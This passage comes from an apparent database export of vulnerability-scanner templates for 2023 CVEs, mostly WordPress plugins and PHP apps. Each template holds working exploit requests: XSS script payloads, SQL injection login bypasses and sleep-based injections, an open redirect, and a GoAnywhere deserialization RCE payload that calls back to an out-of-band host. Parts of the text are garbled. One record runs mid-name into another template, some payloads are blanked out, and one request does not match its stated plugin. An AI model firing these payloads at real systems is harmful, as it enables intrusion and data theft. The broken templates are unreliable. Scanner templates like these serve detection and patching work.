This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of the Membership Database software or apply the necessary security patches provided by the vendor.\n reference:\n - https://wpscan.com/vulnerability/c6cc400a-9bfb-417d-9206-5582a49d0f05\n - https://wordpress.org/plugins/member-database/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0514\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0514\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.29003\n cpe: cpe:2.3:a:membership_database_project:membership_database:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: membership_database_project\n product: membership_database\n framework: wordpress\n tags: cve2023,cve,wpscan,membership-database,wp,wp-plugin,wordpress,authenticated,xss,membership_database_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n POST /wp-admin/admin.php?page=member-database%2Flist_members.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=sort&where=id&operator=%3D&value=asd%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%2F%2F&sortBy=id&ascdesc=asc\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Member Database\")'\n condition: and\n# digest: 
490a0046304402206f0422b248523ed3922d1453f05cf58d5f60c4ae304a8a6f2ecaff8009992d6b022056ea05f2741c237996bb80986bc2a280c311a1d9802f2ae9e9e5a71038db2be2:922c64590222798bb761d5b6d8e72950", "hash": "f022d6edfcc0262112859b48e43c874c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f1" }, "name": "CVE-2023-0527.yaml", "content": "id: CVE-2023-0527\n\ninfo:\n name: Online Security Guards Hiring System - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n A vulnerability was found in PHPGurukul Online Security Guards Hiring System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file search-request.php.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://vuldb.com/?ctiid.219596\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0527\n - https://github.com/ctflearner/Vulnerability/blob/main/Online-Security-guard-POC.md\n - http://packetstormsecurity.com/files/172667/Online-Security-Guards-Hiring-System-1.0-Cross-Site-Scripting.html\n - https://vuldb.com/?id.219596\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0527\n cwe-id: CWE-79\n epss-score: 0.00228\n epss-percentile: 0.6097\n cpe: cpe:2.3:a:online_security_guards_hiring_system_project:online_security_guards_hiring_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: online_security_guards_hiring_system_project\n product: online_security_guards_hiring_system\n tags: cve2023,cve,packetstorm,osghs,xss,online_security_guards_hiring_system_project\n\nhttp:\n - raw:\n - |\n POST /search-request.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n searchdata=&search=\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"\")'\n - 'contains(body, \"Online Security Gauard 
Hiring System |Search Request\")'\n condition: and\n# digest: 4a0a00473045022100a43c27d627e8467ae87028412d582a54888b15b6d467bebb762ba204dbf65113022041c5d7946de5f33a3cbcee2c5c5376022e68453311691ea38e97baf127489725:922c64590222798bb761d5b6d8e72950", "hash": "84ce3da86cf65b79c041e2b4dcb3d4a5", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f2" }, "name": "CVE-2023-0552.yaml", "content": "id: CVE-2023-0552\n\ninfo:\n name: WordPress Pie Register <3.8.2.3 - Open Redirect\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Pie Register plugin before 3.8.2.3 contains an open redirect vulnerability. The plugin does not properly validate the redirection URL when logging in and logging out. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n remediation: |\n Fixed in version 3.8.2.3.\n reference:\n - https://wpscan.com/vulnerability/832c6155-a413-4641-849c-b98ba55e8551\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0552\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2023-0552\n cwe-id: CWE-601\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:genetechsolutions:pie_register:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: genetechsolutions\n product: pie_register\n framework: wordpress\n tags: cve2023,cve,redirect,pie,pie-register,wpscan,genetechsolutions,wordpress\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin?piereg_logout_url=true&redirect_to=https://oast.me\"\n\n redirects: true\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$'\n# digest: 
4a0a004730450221009a43102975ca9cbbf8f2d57a5f3a53496de4ac374bde3bcf0ee22cd7990f8c820220148b4d4d1ca0ef65545d30ac6b9ae93ed2bbf928f8b3e981e19fc44b2a19c151:922c64590222798bb761d5b6d8e72950", "hash": "65dd14b2250d3097c6bb982c33708d06", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f3" }, "name": "CVE-2023-0562.yaml", "content": "id: CVE-2023-0562\n\ninfo:\n name: Bank Locker Management System v1.0 - SQL Injection\n author: Harsh\n severity: critical\n description: |\n A vulnerability was found in PHPGurukul Bank Locker Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file index.php of the component Login. The manipulation of the argument username leads to sql injection.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to extract sensitive information from the database.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://vuldb.com/?ctiid.219716\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0562\n - https://vuldb.com/?id.219716\n - https://github.com/ctflearner/ctflearner\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-0562\n cwe-id: CWE-89\n epss-score: 0.02218\n epss-percentile: 0.89242\n cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: phpgurukul\n product: bank_locker_management_system\n tags: cve,cve2023,blms,sqli,bypass,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /banker/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin%27+AND+4719%3D4719--+GZHh&inputpwd=ABC&login=\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"admin\")'\n - 'contains(body, \"BLMS | Dashboard\")'\n condition: and\n# digest: 
4a0a00473045022100a83e4f426dee5b966ea13ce961702c3c9f146fb91cc171084ddc7b338df6982802205438c91226989896a74aeeae0b041231e409cadbe2eda2301ea0bb1d7eeab9ff:922c64590222798bb761d5b6d8e72950", "hash": "4c77542ae6d2531fc2ce3d0b6c53496c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f4" }, "name": "CVE-2023-0563.yaml", "content": "id: CVE-2023-0563\n\ninfo:\n name: Bank Locker Management System - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: |\n A vulnerability classified as problematic has been found in PHPGurukul Bank Locker Management System 1.0. This affects an unknown part of the file add-locker-form.php of the component Assign Locker. The manipulation of the argument ahname leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://vuldb.com/?ctiid.219717\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0563\n - https://vuldb.com/?id.219717\n - https://github.com/ctflearner/ctflearner\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2023-0563\n cwe-id: CWE-79\n epss-score: 0.00249\n epss-percentile: 0.64164\n cpe: cpe:2.3:a:phpgurukul:bank_locker_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: phpgurukul\n product: bank_locker_management_system\n tags: cve2023,cve,blms,xss,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /search-locker-details.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n 
searchinput=%E2%80%9C%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=\n\n redirects: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"/>\")'\n - 'contains(body, \"Bank Locker Management System\")'\n condition: and\n# digest: 4b0a00483046022100d454a122aad91e9dea4225555e6ced18d36bd03530358996ae175eea4f59a9cc022100e8591a78edb324b44d798e9732dd1eef101ead3d5e1f2de0e91e951457f2293a:922c64590222798bb761d5b6d8e72950", "hash": "6ae3bb5b7358479970a78a984986a563", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f5" }, "name": "CVE-2023-0600.yaml", "content": "id: CVE-2023-0600\n\ninfo:\n name: WP Visitor Statistics (Real Time Traffic) < 6.9 - SQL Injection\n author: r3Y3r53,j4vaovo\n severity: critical\n description: |\n The plugin does not escape user input which is concatenated to an SQL query, allowing unauthenticated visitors to conduct SQL Injection attacks.\n remediation: Fixed in version 6.9\n reference:\n - https://wpscan.com/vulnerability/8f46df4d-cb80-4d66-846f-85faf2ea0ec4\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0600\n - https://github.com/truocphan/VulnBox\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-0600\n cwe-id: CWE-89\n epss-score: 0.02396\n epss-percentile: 0.89644\n cpe: cpe:2.3:a:plugins-market:wp_visitor_statistics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: plugins-market\n product: wp_visitor_statistics\n framework: wordpress\n fofa-query: body=\"wp-stats-manager\"\n public-www: /wp-content/plugins/wp-stats-manager/\n tags: cve,cve2023,wp,wp-plugin,wordpress,wpscan,unauth,wp-stats-manager,sqli,plugins-market\nvariables:\n str: '{{rand_int(100000, 999999)}}'\n\nflow: http(1) && http(2)\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/wp-statistics/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: word\n internal: true\n words:\n - 'Real 
Time Traffic'\n\n - raw:\n - |\n @timeout: 30s\n GET /?wmcAction=wmcTrack&siteId=34&url=test&uid=01&pid=02&visitorId={{str}}%27,sleep(6),0,0,0,0,0);--+- HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(body, \"sleep(6)\")'\n condition: and\n# digest: 490a004630440220261580cf7a6acf3bd48c82b17b9befe18160f0f95f445a299f518bc9a852492902200976177287be838bdccc1077745ec0a5fb67ea2cbf3048964a74b82748fadfed:922c64590222798bb761d5b6d8e72950", "hash": "c9277f4a340fd7efd38800a3afb66086", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f6" }, "name": "CVE-2023-0602.yaml", "content": "id: CVE-2023-0602\n\ninfo:\n name: Twittee Text Tweet <= 1.0.8 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The Twittee Text Tweet WordPress plugin through 1.0.8 does not properly escape POST values which are printed back to the user inside one of the plugin's administrative page, which allows reflected XSS attacks targeting administrators to happen.\n reference:\n - https://wpscan.com/vulnerability/c357f93d-4f21-4cd9-9378-d97756c75255\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0602\n - https://wordpress.org/plugins/twittee-text-tweet/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0602\n cwe-id: CWE-79\n epss-score: 0.00064\n epss-percentile: 0.26204\n cpe: cpe:2.3:a:johnniejodelljr:twittee_text_tweet:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: johnniejodelljr\n product: twittee_text_tweet\n framework: wordpress\n tags: cve2023,cve,wpscan,xss,wordpress,wp,wp-plugin,twittee-text-tweet,johnniejodelljr\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET 
/wp-admin/admin.php?page=vxcf_leads&form_id=cf_5&status&tab=entries&search&order=asc&orderby=file-438&field&time&start_date&end_date=onobw%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3ez2u4g HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains_all(body_2, \"\", \"twittee\")'\n condition: and\n# digest: 4b0a00483046022100e5fce08d81164199e113a5e8a44e47e3a80de938ed5284232742f6ec12745cff022100af62d819e8c9fe644c67d22c4e6cb543bfce8719a6d6046b423facdeed2ee8e7:922c64590222798bb761d5b6d8e72950", "hash": "fe42c9cadfe873c79a71fd89fdb24f90", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f7" }, "name": "CVE-2023-0630.yaml", "content": "id: CVE-2023-0630\n\ninfo:\n name: Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection\n author: DhiyaneshDK\n severity: high\n description: |\n The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information.\n remediation: Fixed in version 4.9.3.3\n reference:\n - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55\n - https://wordpress.org/plugins/wp-slimstat\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0630\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/RandomRobbieBF/CVE-2023-0630\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2023-0630\n cwe-id: CWE-89\n epss-score: 0.05275\n epss-percentile: 0.92293\n cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wp-slimstat\n product: slimstat_analytics\n framework: wordpress\n tags: 
cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n POST /wp-admin/admin-ajax.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n action=parse-media-shortcode&shortcode=[slimstat f=\"count\" w=\"author\"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=7'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"application/json\")'\n - 'contains(body_2, \"audioShortcodeLibrary\")'\n condition: and\n# digest: 4a0a0047304502205d8cfa34716682707fd04b70f6767f9548456638742f3be97df93a370889381f022100f4b24efcacacbf6795ea4cc37fce07c2968f568e61300a6be831a398ff3fd492:922c64590222798bb761d5b6d8e72950", "hash": "f7bcdb2807dad9c9e17af86b6cdfd360", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f8" }, "name": "CVE-2023-0669.yaml", "content": "id: CVE-2023-0669\n\ninfo:\n name: Fortra GoAnywhere MFT - Remote Code Execution\n author: rootxharsh,iamnoooob,dhiyaneshdk,pdresearch\n severity: high\n description: |\n Fortra GoAnywhere MFT is susceptible to remote code execution via unsafe deserialization of an arbitrary attacker-controlled object. 
This stems from a pre-authentication command injection vulnerability in the License Response Servlet.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.\n reference:\n - https://frycos.github.io/vulns4free/2023/02/06/goanywhere-forgotten.html\n - https://my.goanywhere.com/webclient/ViewSecurityAdvisories.xhtml#zerodayfeb1\n - https://infosec.exchange/@briankrebs/109795710941843934\n - https://www.rapid7.com/blog/post/2023/02/03/exploitation-of-goanywhere-mft-zero-day-vulnerability/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0669\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.2\n cve-id: CVE-2023-0669\n cwe-id: CWE-502\n epss-score: 0.96954\n epss-percentile: 0.99709\n cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: fortra\n product: goanywhere_managed_file_transfer\n shodan-query: http.favicon.hash:1484947000\n tags: cve2023,cve,rce,goanywhere,oast,kev,fortra\n\nhttp:\n - raw:\n - |\n POST /goanywhere/lic/accept HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Content-Type: application/x-www-form-urlencoded\n\n bundle={{concat(url_encode(base64(aes_cbc(base64_decode(generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\")), base64_decode(\"Dmmjg5tuz0Vkm4YfSicXG2aHDJVnpBROuvPVL9xAZMo=\"), base64_decode(\"QUVTL0NCQy9QS0NTNVBhZA==\")))), '$2')}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - 'GoAnywhere'\n\n - type: status\n status:\n - 500\n# digest: 
4a0a004730450220207c735e2469d6bf2af5178c7053b234490ccaa8584d568bb036adcc0ca0e16c022100dd5efb4ae7b7db86c7b6caee1806c494eeb8c6ce825ea4d94c449c4a09f4ff96:922c64590222798bb761d5b6d8e72950", "hash": "a31535042108e7a5764860c23db6745b", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085f9" }, "name": "CVE-2023-0678.yaml", "content": "id: CVE-2023-0678\n\ninfo:\n name: PHPIPAM =5'\n - 'status_code_3 == 200'\n - 'contains(body_3, \"Security check\")'\n - 'contains(body_2, \"ap-pricing-tables-lite\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n part: body\n group: 1\n regex:\n - '_wpnonce=([0-9a-z]+)\">Log Out'\n internal: true\n# digest: 490a0046304402205451db383786918c1f14b6751c0ffaeb263600bab8cc76dc938cf3e1847531b902203c9a566e2f17d7cd2501e5dad53491de15f0dcbe0b569a5be1a41ca489e8b894:922c64590222798bb761d5b6d8e72950", "hash": "62a8a753814bd41ee0b48ff02938e381", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085fc" }, "name": "CVE-2023-0942.yaml", "content": "id: CVE-2023-0942\n\ninfo:\n name: WordPress Japanized for WooCommerce <2.5.5 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Japanized for WooCommerce plugin before 2.5.5 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. 
This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.5.5.\n reference:\n - https://wpscan.com/vulnerability/71aa9460-6dea-49cc-946c-d7d4bf723511\n - https://wordpress.org/plugins/woocommerce-for-japan/\n - https://plugins.trac.wordpress.org/browser/woocommerce-for-japan/trunk/includes/admin/views/html-admin-setting-screen.php#L63\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0942\n - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=2868545%40woocommerce-for-japan%2Ftrunk&old=2863064%40woocommerce-for-japan%2Ftrunk&sfp_email=&sfph_mail=\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0942\n cwe-id: CWE-79\n epss-score: 0.0049\n epss-percentile: 0.7561\n cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: artisanworkshop\n product: japanized_for_woocommerce\n framework: wordpress\n tags: cve2023,cve,woocommerce-for-japan,wp,wpscan,wordpress,authenticated,xss,woocommerce,plugin,artisanworkshop\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=wc4jp-options&tab=a HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"\") && contains(body_2, \"woocommerce-for-japan\")'\n condition: and\n# digest: 
4a0a0047304502205a6154be3977335b0b6a8edafe8ebf0cdc8be8592b0dde724b514055ced4fc0e022100935f1df2f35df2ff8160527c45087dc5c1a387351a1dcc8ea9fea63d30041d53:922c64590222798bb761d5b6d8e72950", "hash": "ad800c6b4874778797576142ba8ccbca", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085fd" }, "name": "CVE-2023-0947.yaml", "content": "id: CVE-2023-0947\n\ninfo:\n name: Flatpress < 1.3 - Path Traversal\n author: r3Y3r53\n severity: critical\n description: |\n Path Traversal in GitHub repository flatpressblog/flatpress prior to 1.3.\n reference:\n - https://huntr.dev/bounties/7379d702-72ff-4a5d-bc68-007290015496/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0947\n - https://github.com/flatpressblog/flatpress/commit/9c4e5d6567e446c472f3adae3b2fe612f66871c7\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-0947\n cwe-id: CWE-22\n epss-score: 0.0114\n epss-percentile: 0.84427\n cpe: cpe:2.3:a:flatpress:flatpress:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: flatpress\n product: flatpress\n shodan-query: http.favicon.hash:-1189292869\n tags: cve,cve2023,huntr,lfi,flatpress,listing\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fp-content/\"\n - \"{{BaseURL}}/flatpress/fp-content/\"\n\n stop-at-first-match: true\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(body, \"Index of /fp-content\")'\n condition: and\n# digest: 4a0a00473045022100a6fad072aa7b7a33eeb7febfa517c81a87cdd0458f78e659f4436d97e14cda8c02201122c5d07ec27092761f1e6d267c54e6cd56b9d6df20fe247ee60f0783601bd2:922c64590222798bb761d5b6d8e72950", "hash": "a08fa9fb96cca19edbc7ec9178f6f95d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085fe" }, "name": "CVE-2023-0948.yaml", "content": "id: CVE-2023-0948\n\ninfo:\n name: WordPress Japanized for WooCommerce <2.5.8 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n 
description: |\n WordPress Japanized for WooCommerce plugin before 2.5.8 is susceptible to cross-site scripting via the tab parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.5.8.\n reference:\n - https://wpscan.com/vulnerability/a78d75b2-85a0-41eb-9720-c726ca2e8718\n - https://wordpress.org/plugins/woocommerce-for-japan/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0948\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0948\n cwe-id: CWE-79\n epss-score: 0.00071\n epss-percentile: 0.29003\n cpe: cpe:2.3:a:artisanworkshop:japanized_for_woocommerce:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 2\n vendor: artisanworkshop\n product: japanized_for_woocommerce\n framework: wordpress\n tags: cve,cve2023,wpscan,xss,woocommerce-for-japan,wordpress,wp-plugin,wp,authenticated,artisanworkshop\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=peachpay&tab=field&\"> HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"peachpay\")'\n condition: and\n# digest: 
4a0a0047304502207489300b27fc604ebc086d2dcf53a066f713bf6e155fc3d7e796b5d5e7073f41022100d763b61ecc36c48a60e65fcac863f65fb4d354916e78aef5854c9720707c38f4:922c64590222798bb761d5b6d8e72950", "hash": "a727bd73c658dbe6fa950190e2050dd0", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ff" }, "name": "CVE-2023-0968.yaml", "content": "id: CVE-2023-0968\n\ninfo:\n name: WordPress Watu Quiz <3.3.9.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Watu Quiz plugin before 3.3.9.1 is susceptible to cross-site scripting. The plugin does not sanitize and escape some parameters, such as email, dn, date, and points, before outputting then back in a page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This exploit can be used against high-privilege users such as admin.\n impact: |\n Successful exploitation of this vulnerability could lead to cross-site scripting (XSS) attacks, allowing an attacker to execute malicious scripts on the victim's browser.\n remediation: Fixed in version 3.3.9.1.\n reference:\n - https://wpscan.com/vulnerability/29008d1a-62b3-4f40-b5a3-134455b01595\n - https://wordpress.org/plugins/watu/\n - https://plugins.trac.wordpress.org/browser/watu/trunk/views/takings.php#L31\n - https://nvd.nist.gov/vuln/detail/CVE-2023-0968\n - https://www.wordfence.com/threat-intel/vulnerabilities/id/6341bdcc-c99f-40c3-81c4-ad90ff19f802\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-0968\n cwe-id: CWE-79\n epss-score: 0.00229\n epss-percentile: 0.61047\n cpe: cpe:2.3:a:kibokolabs:watu_quiz:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: kibokolabs\n product: watu_quiz\n framework: wordpress\n tags: 
cve2023,cve,wordpress,wp,wp-plugin,xss,watu,authenticated,wpscan,kibokolabs\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=watu_takings&exam_id=1&dn=\"%2Fonmouseover%3Dalert(document.domain)%2F%2F HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \"/onmouseover=alert(document.domain)//\")'\n - 'contains(body_2, \"Watu Quizzes\")'\n condition: and\n# digest: 490a004630440220101a9d9c53b24a7571530b23ae247be38f0e4664af24681277fdacfd89e411ce02206695c9ba4925e33fea75684fa188a7bbe650cbebaa6750343535fa6fa8939a43:922c64590222798bb761d5b6d8e72950", "hash": "ede9a22749483863a2af0b6206c946d5", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308600" }, "name": 